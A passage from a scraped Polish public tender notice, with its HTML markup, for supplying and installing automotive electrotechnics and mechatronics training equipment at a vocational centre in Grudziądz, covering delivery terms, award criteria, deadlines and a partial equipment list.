uruchomienia oraz bezpłatnego przeszkolenia 2 osób wyznaczonych przez Zamawiającego w zakresie bieżącej obsługi, konserwacji i eksploatacji sprzętu i wyposażenia,- zgodnie ze wszystkimi wymaganiami Zamawiającego wskazanymi w opisie, - fabrycznie nowego, nieużywanego, nieregenerowanego w pełni sprawnego, wolnego od wad materiałowych i produkcyjnych,- zgodnie z parametrami technicznymi podanymi w załącznikach, które należy traktować jako wymagania podstawowe uważane przez Zamawiającego za minimalne.2.	Wykonawca może zaproponować sprzęt i wyposażenie o lepszych parametrach technicznych.3.	Sprzęt i wyposażenie będące przedmiotem dostawy musi spełniać warunki określone dla produktów bezpiecznych w rozumieniu art. 4 ustawy z dnia 12 grudnia 2003 roku o ogólnym bezpieczeństwie produktów (Dz. U. z 2016 r., poz. 2047).4.	Sprzęt i wyposażenie dostarczone przez Wykonawcę musi być kompletne.5.	Samochód osobowy powinien zostać dostarczony przez Wykonawcę z pełnym zbiornikiem paliwa oraz ze wszystkimi płynami eksploatacyjnymi.6.	Wykonawca dostarczy wraz ze sprzętem i wyposażeniem w stosunku do którego istnieje konieczność posiadania certyfikatu, atestu lub deklaracji producenta/wykonawcy za zgodność z normą, niezbędne dokumenty.7.	Wykonawca dostarczy wraz ze sprzętem i wyposażeniem wszelkie niezbędne dokumenty - w języku polskim - konieczne do prawidłowego korzystania z dostarczonego sprzętu i wyposażenia, w tym w szczególności: dokumenty gwarancyjne, instrukcje, atesty, homologacje, certyfikaty oraz inne dokumenty wymagane odrębnymi przepisami prawa, w tym dokumenty umożliwiające rejestrację samochodu osobowego.8.	Dostarczony sprzęt i wyposażenie pozostaje własnością Wykonawcy do momentu skontrolowania ich jakości oraz zgodności z opisem przedmiotu zamówienia oraz podpisania protokołu zdawczo-odbiorczego.9.	Odbiór dostarczonego przedmiotu zamówienia nastąpi w formie protokołu, po uprzednim stwierdzeniu jego zgodności z warunkami zamówienia.10.	Minimalny okres gwarancji został określony w poszczególnych pozycjach podpunktów: 1.1 - 1.15, 2.1 - 2.91 i 3.1 - 3.26 punktu III Opis przedmiotu zamówienia.Okres gwarancji określany jest przez Wykonawcę w pełnych latach. Okres gwarancji liczony będzie od daty podpisania protokołu odbioru przedmiotu zamówienia bez zastrzeżeń. Okres rękojmi równy będzie okresowi gwarancji.11.	Serwis gwarancyjny i okresowe przeglądy gwarancyjne w okresie gwarancji będą świadczone w miejscu przechowywania sprzętu i wyposażenia tj. siedzibie Centrum Kształcenia Praktycznego w Grudziądzu (ul. Czarnieckiego 5/7, 86-300 Grudziądz). Okresowe przeglądy gwarancyjne Wykonawca jest zobowiązany realizować w zakresie oraz z częstotliwością wymaganą przez producenta sprzętu i wyposażenia.12.	Szczegółowe wymagania w zakresie dostawy, montażu i uruchomienia pracowni, gwarancji i serwisu sprzętu i wyposażenia określają wzory umów stanowiące załącznik do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39162110-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34110000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34152000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42662000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44315100-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42661200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44512000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42652000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43800000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-09-28</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy dotyczących zmiany sprzętu i wyposażenia wskazanego w ofercie Wykonawcy - w przypadku braku sprzętu i wyposażenia z przyczyn niezależnych od Wykonawcy (np. wycofanie z rynku, zaprzestanie produkcji). W takim przypadku Wykonawca przekaże Zamawiającemu propozycję sprzętu i wyposażenia o tych samych lub wyższych parametrach - po cenie nie wyższej niż w ofercie Wykonawcy.2. W przypadku wystąpienia okoliczności stanowiących podstawę do zmiany postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie. 3. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-13</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem pracowni elektrotechniki i mechatroniki samochodowej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.1 Samochód osobowy - 1 szt., gwarancja minimum 2 lata, 1.2 Zestaw panelowy ,,Oświetlenie pojazdu samochodowego" - 1 szt., gwarancja minimum 2 lata,1.3 Zestaw panelowy ,,Podstawy elektroniki i elektrotechniki pojazdowej" - 1 szt., gwarancja minimum 2 lata,1.4 Tester potencjometrów i czujników podciśnienia - 1 szt., gwarancja minimum 2 lata,1.5 Tester sondy lambda - 1 szt., gwarancja minimum 2 lata,1.6 Tester czujników Halla - 1 szt., gwarancja minimum 2 lata,1.7 Tester impulsu wtrysku - 1 szt., gwarancja minimum 2 lata,1.8 Symulator czujników temperatury ,,PCT" - 1 szt., gwarancja minimum 2 lata,1.9 Tester regulatorów napięcia 12/24 V - 1 szt., gwarancja minimum 2 lata,1.10 Przystawka PWM-COM - 1 szt., gwarancja minimum 2 lata,1.11 Stanowisko testowania sondy lambda - 1 szt., gwarancja minimum 2 lata,1.12 Tester przepływomierzy powietrza - 1 szt., gwarancja minimum 2 lata,1.13 Tester mechanizmów wykonawczych - 1 szt., gwarancja minimum 2 lata,1.14 Tester modułów zapłonu - 1 szt., gwarancja minimum 2 lata,1.15 Tester pomp paliwa 